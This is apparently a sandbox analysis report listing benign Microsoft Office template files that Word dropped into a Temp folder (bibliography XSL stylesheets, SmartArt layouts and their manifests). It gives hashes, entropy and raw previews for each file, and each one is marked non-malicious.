                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                        C:\Users\user\AppData\Local\Temp\TCD8917.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):252
                                        Entropy (8bit):3.48087342759872
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                        MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                        SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                        SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                        SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD8917.tmp\PictureFrame.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):4326
                                        Entropy (8bit):7.821066198539098
                                        Encrypted:false
                                        SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                        MD5:D32E93F7782B21785424AE2BEA62B387
                                        SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                        SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                        SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                        Malicious:false
                                        Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                        C:\Users\user\AppData\Local\Temp\TCD8927.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):292
                                        Entropy (8bit):3.5026803317779778
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                        MD5:A0D51783BFEE86F3AC46A810404B6796
                                        SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                        SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                        SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8927.tmp\gosttitle.xsl

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):251032
                                        Entropy (8bit):5.102652100491927
                                        Encrypted:false
                                        SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                        MD5:F425D8C274A8571B625EE66A8CE60287
                                        SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                        SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                        SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                        C:\Users\user\AppData\Local\Temp\TCD8938.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):286
                                        Entropy (8bit):3.5502940710609354
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                        MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                        SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                        SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                        SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8938.tmp\iso690.xsl

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):270198
                                        Entropy (8bit):5.073814698282113
                                        Encrypted:false
                                        SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                        MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                        SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                        SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                        SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                        C:\Users\user\AppData\Local\Temp\TCD8948.tmp\CircleProcess.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):16806
                                        Entropy (8bit):7.9519793977093505
                                        Encrypted:false
                                        SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                        MD5:950F3AB11CB67CC651082FEBE523AF63
                                        SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                        SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                        SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                        Malicious:false
                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                        C:\Users\user\AppData\Local\Temp\TCD8948.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):254
                                        Entropy (8bit):3.4720677950594836
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                        MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                        SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                        SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                        SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD8949.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):332
                                        Entropy (8bit):3.547857457374301
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                        MD5:4EC6724CBBA516CF202A6BD17226D02C
                                        SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                        SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                        SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8949.tmp\harvardanglia2008officeonline.xsl

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):284415
                                        Entropy (8bit):5.00549404077789
                                        Encrypted:false
                                        SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                        MD5:33A829B4893044E1851725F4DAF20271
                                        SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                        SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                        SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                        C:\Users\user\AppData\Local\Temp\TCD89E7.tmp\APASixthEditionOfficeOnline.xsl

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):333258
                                        Entropy (8bit):4.654450340871081
                                        Encrypted:false
                                        SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                        MD5:5632C4A81D2193986ACD29EADF1A2177
                                        SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                        SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                        SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                        C:\Users\user\AppData\Local\Temp\TCD89E7.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):328
                                        Entropy (8bit):3.541819892045459
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                        MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                        SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                        SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                        SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8B4F.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):288
                                        Entropy (8bit):3.523917709458511
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                        MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                        SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                        SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                        SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8B4F.tmp\chicago.xsl

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):296658
                                        Entropy (8bit):5.000002997029767
                                        Encrypted:false
                                        SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                        MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                        SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                        SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                        SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                        C:\Users\user\AppData\Local\Temp\TCD8BBD.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):374
                                        Entropy (8bit):3.5414485333689694
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                        MD5:2F7A8FE4E5046175500AFFA228F99576
                                        SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                        SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                        SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8BBD.tmp\Text Sidebar (Annual Report Red and Black design).docx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):47296
                                        Entropy (8bit):6.42327948041841
                                        Encrypted:false
                                        SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                        MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                        SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                        SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                        SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                        Malicious:false
                                        Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                        C:\Users\user\AppData\Local\Temp\TCD8BED.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):286
                                        Entropy (8bit):3.4670546921349774
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                        MD5:3D52060B74D7D448DC733FFE5B92CB52
                                        SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                        SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                        SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD8BED.tmp\ThemePictureAlternatingAccent.glox

